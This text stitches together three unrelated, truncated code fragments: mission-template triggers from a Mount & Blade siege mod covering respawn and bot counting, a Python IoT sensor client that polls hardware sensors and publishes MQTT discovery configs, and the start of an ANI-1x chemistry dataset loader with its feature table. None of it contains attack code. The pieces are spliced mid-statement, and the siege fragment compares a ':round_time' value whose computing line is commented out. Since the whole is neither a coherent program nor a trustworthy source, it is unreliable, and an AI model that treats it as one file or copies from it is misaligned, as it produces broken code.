(val_add, ":num_active_players_in_team_0", 1),
(else_try),
(eq, ":cur_player_team", 1),
(val_add, ":num_active_players_in_team_1", 1),
(try_end),
(val_add, ":num_active_players", 1),
(try_end),
(try_for_range, ":player_no", "$g_player_loops_begin", multiplayer_player_loops_end),
(player_is_active, ":player_no"),
(player_slot_eq, ":player_no", slot_player_spawned_this_round, 0),
(neg|player_is_busy_with_menus, ":player_no"),
(player_get_team_no, ":player_team", ":player_no"), #if player is currently spectator do not spawn his agent
(lt, ":player_team", multi_team_spectator),
(player_get_troop_id, ":player_troop", ":player_no"), #if troop is not selected do not spawn his agent
(ge, ":player_troop", 0),
(player_get_agent_id, ":player_agent", ":player_no"), #new added for siege mod
(assign, ":spawn_new", 0),
(try_begin),
(eq, "$g_round_ended", 0),
(try_begin), #addition for siege mod to allow players spawn more than once (begin)
(lt, ":player_agent", 0),
(try_begin), #new added begin, to avoid siege-crack (rejoining of defenders when they die)
(eq, ":player_team", 0),
(player_get_slot, ":player_last_team_select_time", ":player_no", slot_player_last_team_select_time),
(store_mission_timer_a, ":current_time"),
(store_sub, ":elapsed_time", ":current_time", ":player_last_team_select_time"),
(assign, ":player_team_respawn_period", "$g_multiplayer_respawn_period"),
(val_add, ":player_team_respawn_period", multiplayer_siege_mod_defender_team_extra_respawn_time), #new added for siege mod
(lt, ":elapsed_time", ":player_team_respawn_period"),
#(store_sub, ":round_time", ":current_time", "$g_round_start_time"),
(ge, ":round_time", multiplayer_new_agents_finish_spawning_time),
(gt, ":num_active_players", 2),
(store_mul, ":multipication_of_num_active_players_in_teams", ":num_active_players_in_team_0", ":num_active_players_in_team_1"),
(neq, ":multipication_of_num_active_players_in_teams", 0),
(assign, ":spawn_new", 0),
(else_try), #new added end
(assign, ":spawn_new", 1),
(try_end),
(else_try),
(agent_get_time_elapsed_since_removed, ":elapsed_time", ":player_agent"),
(assign, ":player_team_respawn_period", "$g_multiplayer_respawn_period"),
(try_begin),
(eq, ":player_team", 0),
(val_add, ":player_team_respawn_period", multiplayer_siege_mod_defender_team_extra_respawn_time),
(try_end),
(this_or_next|gt, ":elapsed_time", ":player_team_respawn_period"),
(player_slot_eq, ":player_no", slot_player_spawned_at_siege_round, 0),
(assign, ":spawn_new", 1),
(try_end),
(try_end), #addition for siege mod to allow players spawn more than once (end)
(eq, ":spawn_new", 1),
(player_get_slot, ":spawn_count", ":player_no", slot_player_spawn_count),
(try_begin),
(gt, "$g_multiplayer_number_of_respawn_count", 0),
(try_begin),
(eq, ":player_team", 0),
(ge, ":spawn_count", "$g_multiplayer_number_of_respawn_count"),
(assign, ":spawn_new", 0),
(else_try),
(eq, ":player_team", 1),
(ge, ":spawn_count", 999),
(assign, ":spawn_new", 0),
(try_end),
(try_end),
(eq, ":spawn_new", 1),
(call_script, "script_multiplayer_buy_agent_equipment", ":player_no"),
(val_add, ":spawn_count", 1),
(try_begin),
(ge, ":spawn_count", "$g_multiplayer_number_of_respawn_count"),
(gt, "$g_multiplayer_number_of_respawn_count", 0),
(eq, ":player_team", 0),
(assign, ":spawn_count", 999),
(try_end),
(player_set_slot, ":player_no", slot_player_spawn_count, ":spawn_count"),
(try_begin),
(lt, ":round_time", 30), #at start of round spawn at base entry point (only attackers)
(eq, ":player_team", 1),
(assign, ":entry_no", multi_initial_spawn_point_team_2),
(else_try),
(eq, ":player_team", 0), #Defenders
(store_random_in_range, ":entry_no", 0, 32), # Spawn at random defender spawn (0-31)
(else_try),
(eq, ":player_team", 1), #Attackers
(store_random_in_range, ":entry_no", 32, 64), # Spawn at random attacker spawn (32-63)
(try_end),
(player_spawn_new_agent, ":player_no", ":entry_no"),
(player_set_slot, ":player_no", slot_player_spawned_this_round, 1),
(player_set_slot, ":player_no", slot_player_spawned_at_siege_round, 1),
(try_end),
]),
(1, 0, 0, [ (multiplayer_is_server),
(this_or_next|gt,"$g_multiplayer_num_bots_team_1",0),
(gt,"$g_multiplayer_num_bots_team_2",0), # are there any bots? :p
(store_mission_timer_a, ":mission_timer"),
(ge, ":mission_timer", 2)
], #do this in every new frame, but not at the same time
[
(assign, ":team_1_count", 0),
(assign, ":team_2_count", 0),
(try_for_agents, ":cur_agent"),
(agent_is_active, ":cur_agent"),
(agent_is_non_player, ":cur_agent"),
(agent_is_human, ":cur_agent"),
(assign, ":will_be_counted", 0),
(try_begin),
(agent_is_alive, ":cur_agent"),
(assign, ":will_be_counted", 1), #alive so will be counted
(else_try),
(agent_get_time_elapsed_since_removed, ":elapsed_time", ":cur_agent"),
(le, ":elapsed_time", "$g_multiplayer_respawn_period"),
(assign, ":will_be_counted", 1),
(try_end),
(eq, ":will_be_counted", 1),
(agent_get_team, ":cur_team", ":cur_agent"),
(try_begin),
(eq, ":cur_team", 0),
(val_add, ":team_1_count", 1),
(else_try),
(eq, ":cur_team", 1),
(val_add, ":team_2_count", 1),
(try_end),
(try_end),
(store_sub, "$g_multiplayer_num_bots_required_team_1", "$g_multiplayer_num_bots_team_1", ":team_1_count"),
(store_sub, "$g_multiplayer_num_bots_required_team_2", "$g_multiplayer_num_bots_team_2", ":team_2_count"),
(val_max, "$g_multiplayer_num_bots_required_team_1", 0),
(val_max, "$g_multiplayer_num_bots_required_team_2", 0),
]),
multiplayer_server_spawn_bots,
multiplayer_server_manage_bots,
multiplayer_server_check_end_map,
(ti_tab_pressed, 0, 0, [],
[
(try_begin),
(eq, "$g_multiplayer_mission_end_screen", 0),
(assign, "$g_multiplayer_stats_chart_opened_manually", 1),
(start_presentation, "prsnt_multiplayer_stats_chart"),
(try_end),
]),
multiplayer_once_at_the_first_frame,
(ti_escape_pressed, 0, 0, [],
[
(neg|is_presentation_active, "prsnt_multiplayer_escape_menu"),
(neg|is_presentation_active, "prsnt_multiplayer_stats_chart"),
(eq, "$g_waiting_for_confirmation_to_terminate", 0),
(start_presentation, "prsnt_multiplayer_escape_menu"),
]),
] + mm_multiplayer_common,
),
(
"multiplayer_bt",mtf_battle_mode,-1, #battle mode
"You lead your men to battle.",
[
(0,mtef_visitor_source|mtef_team_0|mtef_no_auto_reset,0,aif_start_alarmed,1,[]),
(1,mtef_visitor_source|mtef_team_0|mtef_no_auto_reset,0,aif_start_alarmed,1,[]),
(2,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(3,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(4,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(5,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(6,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(7,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(8,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(9,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(10,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(11,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(12,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(13,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(14,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(15,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(16,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(17,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(18,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(19,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(20,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(21,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(22,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(23,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(24,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(25,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(26,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(27,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(28,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(29,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(30,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(31,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(32,mtef_visitor_source|mtef_team_0|mtef_no_auto_reset,0,aif_start_alarmed,1,[]),
(33,mtef_visitor_source|mtef_team_0|mtef_no_auto_reset,0,aif_start_alarmed,1,[]),
(34,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(35,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(36,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(37,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(38,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(39,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(40,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(41,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(42,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(43,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(44,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(45,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(46,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(47,mtef_visitor_source|mtef_team_0,0,aif_start_alarmed,1,[]),
(48,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(49,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(50,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(51,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(52,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(53,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(54,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(55,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(56,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(57,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(58,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(59,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(60,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(61,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(62,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
(63,mtef_visitor_source|mtef_team_1,0,aif_start_alarmed,1,[]),
],
[
common_battle_init_banner,
multiplayer_server_check_polls,
multiplayer_server_bonuses,
(ti_server_player_joined, 0, 0, [],
[
(store_trigger_param_1, ":player_no"),
(call_script, "script_multiplayer_server_player_joined_common", ":player_no"),
]),
(ti_before_mission_start, 0, 0, [],
[
(assign, "$g_multiplayer_game_type", multiplayer_game_type_battle),
(call_script, "script_multiplayer_server_before_mission_start_common"),
(assign, "$g_waiting_for_confirmation_to_terminate", 0),
(assign, "$g_round_ended", 0),
(try_begin),
(multiplayer_is_server),
(assign, "$server_mission_timer_while_player_joined", 0),
(assign, "$g_round_start_time", 0),
(try_end),
(assign, "$my_team_at_start_of_round", -1),
(call_script, "script_multiplayer_init_mission_variables"),
(call_script, "script_multiplayer_remove_headquarters_flags"),
#MM
(call_script, "script_multiplayer_mm_before_mission_start_common"),
]),
(ti_after_mission_start, 0, 0, [],
[
(call_script, "script_determine_team_flags", 0),
(call_script, "script_determine_team_flags", 1),
(set_spawn_effector_scene_prop_kind, 0, -1), #during this mission, agents of "team 0" will try to spawn around scene props with kind equal to -1(no effector for this mod)
(set_spawn_effector_scene_prop_kind, 1, -1), #during this mission, agents of "team 1" will try to spawn around scene props with kind equal to -1(no effector for this mod)
(try_begin),
(multiplayer_is_server),
(assign, "$g_multiplayer_ready_for_spawning_agent", 1),
(assign, | |
# <gh_stars>0
"""
This module provides a class for interfacing with sensors and actuators. It can add, edit and remove
sensors and actuators as well as monitor their states and execute commands.
"""
from datetime import datetime, timedelta
from json import dumps, loads
from os import getpid, path
from threading import Event, RLock
from myDevices.cloud import cayennemqtt
from myDevices.cloud.dbmanager import DbManager
from myDevices.cloud.download_speed import DownloadSpeed
from myDevices.devices import instance, manager
from myDevices.devices.bus import BUSLIST, checkAllBus
from myDevices.devices.digital.gpio import NativeGPIO as GPIO
from myDevices.system import services
from myDevices.system.systeminfo import SystemInfo
from myDevices.plugins.manager import PluginManager
from myDevices.utils.config import Config, APP_SETTINGS
from myDevices.utils.daemon import Daemon
from myDevices.utils.logger import debug, error, exception, info, logJson, warn
from myDevices.utils.threadpool import ThreadPool
from myDevices.utils.types import M_JSON
# from myDevices.system.hardware import Hardware
from myDevices.devices.manager import DYNAMIC_DEVICES
REFRESH_FREQUENCY = 15 #seconds between full sensor/system polling cycles
REAL_TIME_FREQUENCY = 60/55 #Seconds/messages, this is done to keep messages under the rate limit
# Statically declared sensors: maps a key to the driver class ('device'), its
# constructor arguments ('args'), a display 'description' and the registration
# 'name' passed to AddSensor.
# NOTE(review): 'h2s' and 'nh3' share index 6, and temperature/pressure/
# humidity share index 7 (one BME280 chip) — confirm the duplicate h2s/nh3
# index is intentional.
sensors = {
    'PCF8591' : {'description': 'PCF8591','index':0, 'device': 'PCF8591','args': {}, 'name': 'adc'},
    'distance' : {'description': 'distance', 'index':1 ,'device': 'VL6180X','args': {}, 'name': 'distance'},
    'object_temperature' : {'description': 'ir_temperature', 'index':2, 'device': 'MLX90614','args': {'obj_temp': True}, 'name': 'ir_body'},
    'amb_temperature' : {'description': 'climate_temperature', 'index':3,'device': 'MLX90614','args': {'obj_temp': False}, 'name': 'ir_reference'},
    'illuminance' : {'description': 'illuminance','index':4, 'device': 'GY30','args': {}, 'name': 'illuminance'},
    'co2' : {'description': 'co2', 'index':5,'device': 'CO2Sensor','args': {'adc': 'adc', 'channel': 3}, 'name': 'co2'},
    'h2s' : {'description': 'h2s', 'index':6,'device': 'MQSensor', 'args': {'adc': 'adc', 'channel': 2}, 'name': 'h2s'},
    'nh3' : {'description': 'nh3', 'index':6,'device': 'MQSensor', 'args': {'adc': 'adc', 'channel': 4}, 'name': 'nh3'},
    # 'bme280' : {'description': 'climate','index':7, 'device': 'BME280','args': {'temperature':True,'pressure': True,'humidity': True}, 'name': 'temperature'},
    'temperature' : {'description': 'temperature','index':7, 'device': 'BME280','args': {'temperature':True}, 'name': 'climate_temperature'},
    'pressure' : {'description': 'pressure','index':7, 'device': 'BME280','args': {'pressure':True}, 'name': 'climate_pressure'},
    'humidity' : {'description': 'humidity','index':7, 'device': 'BME280','args': {'humidity':True}, 'name': 'climate_humidity'}
}
class SensorsClient():
"""Class for interfacing with sensors and actuators"""
    def __init__(self,client):
        """Initialize bus/sensor state and start the monitoring threads.

        Args:
            client: Cloud client used to publish sensor data; must expose
                ``hardware.Serial`` and ``EnqueuePacket`` (and ``location``,
                used when building MQTT discovery payloads).
        """
        self.cloudClient = client
        self.sensorMutex = RLock()      # guards sensor add/edit/remove
        self.realTimeMutex = RLock()    # guards the real-time data queues
        self.exiting = Event()          # set to stop the monitor threads
        self.onDataChanged = None       # callback invoked with changed data
        self.systemData = []            # last full state that was reported
        self.currentSystemState = []    # state being assembled this cycle
        self.currentRealTimeData = {}   # next real-time batch, keyed by name
        self.queuedRealTimeData = {}    # overflow batch for the following cycle
        self.disabledSensors = {}
        self.disabledSensorTable = "disabled_sensors"
        checkAllBus()
        self.gpio = GPIO()
        # self.downloadSpeed = DownloadSpeed(Config(APP_SETTINGS))
        # self.downloadSpeed.getDownloadSpeed()
        manager.addDeviceInstance("GPIO", "GPIO", "GPIO", self.gpio, [], "system")
        manager.loadJsonDevices("rest")
        if not DYNAMIC_DEVICES :
            warn("loadJsonDevices is None")
        # Register the statically declared sensors from the module-level table.
        for sensor in sensors.values():
            # info('--------{} {} {}'.format(sensor['name'], sensor['description'], sensor['device']))
            self.AddSensor(sensor['name'],sensor['description'], sensor['device'], sensor['args'])
        #
        # info(DYNAMIC_DEVICES)
        self.config = Config(APP_SETTINGS)
        self.clientId = self.config.get('Agent', 'ClientID', None)
        self.mqtt_dis_prefix = self.config.get('Agent', 'MQTT_DIS_PREFIX', "homeassistant")
        self.serial = self.cloudClient.hardware.Serial
        # Publish an MQTT discovery message for each dynamic device, skipping
        # raw converter types (DAC/ADC) which have no direct reading.
        for name,device in DYNAMIC_DEVICES.items():
            for type in device['type'] :
                if type in ['DAC','ADC']:
                    continue
                topic,message = self.AddMQTTSensorDevice(name,type,device)
                if self.cloudClient:
                    info("{} {}".format(topic,message))
                    self.cloudClient.EnqueuePacket(message,topic)
        # info(mqttsensor)
        # Restore the persisted set of sensors the user has disabled.
        results = DbManager.Select(self.disabledSensorTable)
        if results:
            for row in results:
                self.disabledSensors[row[0]] = 1
        self.realTimeMonitorRunning = False
        self.pluginManager = PluginManager(self.OnPluginChange)
        self.pluginManager.load_plugins()
        self.InitCallbacks()
        self.StartMonitoring()
def AddMQTTSensorDevice(self,name,type, device):
sensor_topic = "sensor/{}/{}/config".format(self.serial,name )
unit = {"Temperature": "℃", "Humidity":"%", "Pressure":"pa", "Distance":"mm", "MQSensor":"ppm", "Luminosity":"lu", "CO2Sensor":"ppm"}
icon = {"Temperature": "mdi:coolant-temperature", "Humidity":"mdi:water", "Pressure":"mdi:file-powerpoint-box", "Distance":"mdi:ruler", "MQSensor":"mdi:gas-cylinder", "Luminosity":"mdi:white-balance-sunny", "CO2Sensor":"mdi:periodic-table-co2"}
sensor_config = \
{
"device_class": "temperature",
"name": "{}{}".format(self.cloudClient.location,name) ,
"state_topic": "{}/sensor/{}/dev:{}/state".format(self.mqtt_dis_prefix, self.serial, name),
"unit_of_measurement": unit[type],
"icon": icon[type],
"value_template": "{{ value_json.value}}"
}
return sensor_topic,sensor_config
def SetDataChanged(self, onDataChanged=None):
"""Set callback to call when data has changed
Args:
onDataChanged: Function to call when sensor data changes
"""
self.onDataChanged = onDataChanged
def QueueRealTimeData(self, name, data):
"""Add real-time data to queue to be sent on thread
Args:
name: The name to use for the data
data: The data to send
"""
with self.realTimeMutex:
if name not in self.currentRealTimeData:
self.currentRealTimeData[name] = data
else:
self.queuedRealTimeData[name] = data
def OnSensorChange(self, device, value):
"""Callback that is called when digital sensor data has changed
Args:
device: The device that has changed data
value: The new data value
"""
debug('OnSensorChange: {}, {}'.format(device, value))
with self.realTimeMutex:
data = {'name': device['description'], 'value': value, 'type': 'digital_sensor', 'unit': 'd'}
if 'args' in device:
data['args'] = device['args']
self.QueueRealTimeData(device['name'], data)
def OnPluginChange(self, data):
"""Callback that is called when digital sensor data has changed
Args:
data: The new data value
"""
debug('OnPluginChange: {}'.format(data))
self.QueueRealTimeData(data['id'], data)
with self.realTimeMutex:
if not self.realTimeMonitorRunning:
ThreadPool.Submit(self.RealTimeMonitor)
def OnGpioStateChange(self, channel, value):
"""Send updated pin state when it has changed
Args:
channel: The pin number
value: The new value for the pin
"""
debug('OnGpioStateChange: channel {}, value {}'.format(channel, value))
data = []
cayennemqtt.DataChannel.add_unique(data, cayennemqtt.SYS_GPIO, channel, cayennemqtt.VALUE, value)
if not self.realTimeMonitorRunning:
self.onDataChanged(data)
else:
self.QueueRealTimeData(data[0]['channel'], data[0])
def InitCallbacks(self):
"""Set callback function for any digital devices that support them"""
devices = manager.getDeviceList()
for device in devices:
sensor = instance.deviceInstance(device['name'])
if 'DigitalSensor' in device['type'] and hasattr(sensor, 'setCallback'):
debug('Set callback for {}'.format(sensor))
sensor.setCallback(self.OnSensorChange, device)
if not self.realTimeMonitorRunning:
ThreadPool.Submit(self.RealTimeMonitor)
def RemoveCallbacks(self):
"""Remove callback function for all digital devices"""
devices = manager.getDeviceList()
for device in devices:
sensor = instance.deviceInstance(device['name'])
if 'DigitalSensor' in device['type'] and hasattr(sensor, 'removeCallback'):
sensor.removeCallback()
def StartMonitoring(self):
"""Start thread monitoring sensor data"""
# pass
ThreadPool.Submit(self.Monitor)
def StopMonitoring(self):
"""Stop thread monitoring sensor data"""
self.RemoveCallbacks()
self.exiting.set()
def Monitor(self):
"""Monitor bus/sensor states and system info and report changed data via callbacks"""
debug('Monitoring sensors and os resources started')
sendAllDataCount = 0
nextTime = datetime.now()
while not self.exiting.is_set():
try:
difference = nextTime - datetime.now()
delay = min(REFRESH_FREQUENCY, difference.total_seconds())
delay = max(0, delay)
if not self.exiting.wait(delay):
nextTime = datetime.now() + timedelta(seconds=REFRESH_FREQUENCY)
self.currentSystemState = []
self.MonitorSystemInformation()
self.MonitorSensors()
self.MonitorPlugins()
self.MonitorBus()
if self.currentSystemState != self.systemData:
data = self.currentSystemState
if self.systemData and not sendAllDataCount == 0:
data = [x for x in self.currentSystemState if x not in self.systemData]
if self.onDataChanged and data:
self.onDataChanged(data)
sendAllDataCount += 1
if sendAllDataCount >= 4:
sendAllDataCount = 0
self.systemData = self.currentSystemState
except:
exception('Monitoring sensors and os resources failed')
debug('Monitoring sensors and os resources finished')
def RealTimeMonitor(self):
"""Monitor real-time state changes and report changed data via callbacks"""
self.realTimeMonitorRunning = True
info('Monitoring real-time state changes')
nextTime = datetime.now()
while not self.exiting.is_set():
try:
if not self.exiting.wait(0.5):
if datetime.now() > nextTime:
nextTime = datetime.now() + timedelta(seconds=REAL_TIME_FREQUENCY)
self.SendRealTimeData()
except:
exception('Monitoring real-time changes failed')
debug('Monitoring real-time changes finished')
self.realTimeMonitorRunning = False
    def SendRealTimeData(self):
        """Send the current batch of real-time data via the onDataChanged callback.

        Under the queue lock the current batch is converted into data-channel
        items, overflow entries that duplicate what is being sent are dropped,
        and the overflow queue is promoted to be the next current batch.
        """
        data = []
        with self.realTimeMutex:
            if self.currentRealTimeData:
                for name, item in self.currentRealTimeData.items():
                    # GPIO entries are already formatted data-channel items.
                    if cayennemqtt.SYS_GPIO in name:
                        data.append(item)
                    else:
                        cayennemqtt.DataChannel.add_unique(data, cayennemqtt.DEV_SENSOR, name, value=item['value'], name=item['name'], type=item['type'], unit=item['unit'])
                        # Best-effort: mirror the value on the GPIO channel when
                        # the item carries args['channel']; missing keys are
                        # expected for non-GPIO-backed sensors.
                        try:
                            cayennemqtt.DataChannel.add_unique(data, cayennemqtt.SYS_GPIO, item['args']['channel'], cayennemqtt.VALUE, item['value'])
                        except:
                            pass
                    # Drop a queued duplicate so an unchanged value is not
                    # re-sent on the next cycle.
                    if name in self.queuedRealTimeData and self.queuedRealTimeData[name]['value'] == item['value']:
                        del self.queuedRealTimeData[name]
                # Promote the overflow queue to be the next batch.
                self.currentRealTimeData = self.queuedRealTimeData
                self.queuedRealTimeData = {}
        if data:
            self.onDataChanged(data)
def MonitorSensors(self):
"""Check sensor states for changes"""
if self.exiting.is_set():
return
self.currentSystemState += self.SensorsInfo()
def MonitorPlugins(self):
"""Check plugin states for changes"""
if self.exiting.is_set():
return
self.currentSystemState += self.pluginManager.get_plugin_readings()
def MonitorBus(self):
"""Check bus states for changes"""
if self.exiting.is_set():
return
self.currentSystemState += self.BusInfo()
def MonitorSystemInformation(self):
"""Check system info for changes"""
if self.exiting.is_set():
return
self.currentSystemState += self.SystemInformation()
def SystemInformation(self):
"""Return dict containing current system info, including CPU, RAM, storage and network info"""
newSystemInfo = []
try:
systemInfo = SystemInfo()
newSystemInfo = systemInfo.getSystemInformation()
# download_speed = self.downloadSpeed.getDownloadSpeed()
# if download_speed:
# cayennemqtt.DataChannel.add(newSystemInfo, cayennemqtt.SYS_NET, suffix=cayennemqtt.SPEEDTEST, value=download_speed, type='bw', unit='mbps')
except Exception:
exception('SystemInformation failed')
return newSystemInfo
def CallDeviceFunction(self, func, *args):
"""Call a function for a sensor/actuator device and format the result value type
Args:
func: Function to call
args: Parameters to pass to the function
Returns:
True for success, False otherwise.
"""
result = func(*args)
debug("result={}".format(result))
if result != None:
if hasattr(func, "contentType"):
if func.contentType != M_JSON:
value_type = type(result)
response = value_type(func.format % result)
else:
response = result
else:
response = result
debug("response={}".format(response))
return response
def BusInfo(self):
"""Return a dict with current bus info"""
bus_info = []
gpio_state = self.gpio.wildcard()
for key, value in gpio_state.items():
cayennemqtt.DataChannel.add(bus_info, cayennemqtt.SYS_GPIO, key, cayennemqtt.VALUE, value['value'])
cayennemqtt.DataChannel.add(bus_info, cayennemqtt.SYS_GPIO, key, cayennemqtt.FUNCTION, value['function'])
return bus_info
def SensorsInfo(self):
"""Return a list with current sensor states for all enabled sensors"""
manager.deviceDetector()
devices = manager.getDeviceList()
sensors_info = []
if devices is None:
return sensors_info
for device in devices:
sensor = instance.deviceInstance(device['name'])
if 'enabled' not in device or device['enabled'] == 1:
sensor_types = {'Temperature': {'function': 'getCelsius', 'data_args': {'type': 'temperature', 'unit': 'c'}},
'Humidity': {'function': 'getHumidityPercent', 'data_args': {'type': 'humidity', 'unit': 'p'}},
'Pressure': {'function': 'getPascal', 'data_args': {'type': 'pressure', 'unit': 'pa'}},
'Luminosity': {'function': 'getLux', 'data_args': {'type': 'illuminance', 'unit': 'lux'}},
'Distance': {'function': 'getCentimeter', 'data_args': {'type': 'prox', 'unit': 'cm'}},
'MQSensor': {'function': 'getMQ', 'data_args': {'type': 'mq136','unit': 'ppm'}},
'CO2Sensor': {'function': 'readCO2', 'data_args': {'type': 'co2','unit': 'ppm'}},
'ServoMotor': {'function': 'readAngle', 'data_args': {'type': 'analog_actuator'}},
'DigitalSensor': {'function': 'read', 'data_args': {'type': 'digital_sensor', 'unit': 'd'}},
'DigitalActuator': {'function': 'read', 'data_args': {'type': 'digital_actuator', 'unit': 'd'}},
| |
with the lowest value
'max' - choose the index with the highest value
'random' - choose the index randomly
int - choose the index int
Na = number of atoms, Nc = number of conformations
Atomic Positions ‘coordinates’ Å float32 (Nc, Na, 3)
Atomic Numbers ‘atomic_numbers’ — uint8 (Na)
Total Energy ‘wb97x_dz.energy’ Ha float64 (Nc)
‘wb97x_tz.energy’ Ha float64 (Nc)
‘ccsd(t)_cbs.energy’ Ha float64 (Nc)
HF Energy ‘hf_dz.energy’ Ha float64 (Nc)
‘hf_tz.energy’ Ha float64 (Nc)
‘hf_qz.energy’ Ha float64 (Nc)
NPNO-CCSD(T) ‘npno_ccsd(t)_dz.corr_energy’ Ha float64 (Nc)
Correlation ‘npno_ccsd(t)_tz.corr_energy’ Ha float64 (Nc)
Energy ‘npno_ccsd(t)_qz.corr_energy’ Ha float64 (Nc)
MP2 ‘mp2_dz.corr_energy’ Ha float64 (Nc)
Correlation ‘mp2_tz.corr_energy’ Ha float64 (Nc)
Energy ‘mp2_qz.corr_energy’ Ha float64 (Nc)
Atomic Forces ‘wb97x_dz.forces’ Ha/Å float32 (Nc, Na, 3)
‘wb97x_tz.forces’ Ha/Å float32 (Nc, Na, 3)
Molecular ‘wb97x_dz.dipole’ e Å float32 (Nc, 3)
Electric ‘wb97x_tz.dipole’ e Å float32 (Nc, 3)
    Moments            ‘wb97x_tz.quadrupole’          e Å²     float32  (Nc, 6)
Atomic ‘wb97x_dz.cm5_charges’ e float32 (Nc, Na)
Charges ‘wb97x_dz.hirshfeld_charges’ e float32 (Nc, Na)
‘wb97x_tz.mbis_charges’ e float32 (Nc, Na)
Atomic ‘wb97x_tz.mbis_dipoles’ a.u. float32 (Nc, Na)
Electric ‘wb97x_tz.mbis_quadrupoles’ a.u. float32 (Nc, Na)
Moments ‘wb97x_tz.mbis_octupoles’ a.u. float32 (Nc, Na)
Atomic Volumes ‘wb97x_tz.mbis_volumes’ a.u. float32 (Nc, Na)
"""
features = ['atomic_numbers', 'ccsd(t)_cbs.energy', 'coordinates', 'hf_dz.energy',
'hf_qz.energy', 'hf_tz.energy', 'mp2_dz.corr_energy', 'mp2_qz.corr_energy',
'mp2_tz.corr_energy', 'npno_ccsd(t)_dz.corr_energy', 'npno_ccsd(t)_tz.corr_energy',
'tpno_ccsd(t)_dz.corr_energy', 'wb97x_dz.cm5_charges', 'wb97x_dz.dipole',
'wb97x_dz.energy', 'wb97x_dz.forces', 'wb97x_dz.hirshfeld_charges',
'wb97x_dz.quadrupole', 'wb97x_tz.dipole', 'wb97x_tz.energy', 'wb97x_tz.forces',
'wb97x_tz.mbis_charges', 'wb97x_tz.mbis_dipoles', 'wb97x_tz.mbis_octupoles',
'wb97x_tz.mbis_quadrupoles', 'wb97x_tz.mbis_volumes']
def __init__(self, features=['atomic_numbers'], targets=[], pad=63,
embed=[(9,16,True)], criterion=None, conformation='random',
in_file='./data/ani1/ani1x-release.h5'):
self.features, self.targets = features, targets
self.conformation, self.embed = conformation, embed
self.in_file, self.pad, self.criterion = in_file, pad, criterion
self.datadic = self.load_data(features, targets, in_file)
self.ds_idx = list(self.datadic.keys())
def __getitem__(self, i):
ci = self.get_conformation_index(self.datadic[i])
def get_features(features, dtype, exclude_cat=False):
data = []
for f in features:
if f == 'atomic_numbers' and exclude_cat:
continue
#(Na)
elif f in ['atomic_numbers']:
out = np.reshape(self.datadic[i][f], -1).astype(dtype)
if self.pad:
out = np.pad(out, (0, (self.pad - out.shape[0])))
#(Nc, Na)
elif f in ['wb97x_dz.cm5_charges','wb97x_dz.hirshfeld_charges',
'wb97x_tz.mbis_charges','wb97x_tz.mbis_dipoles',
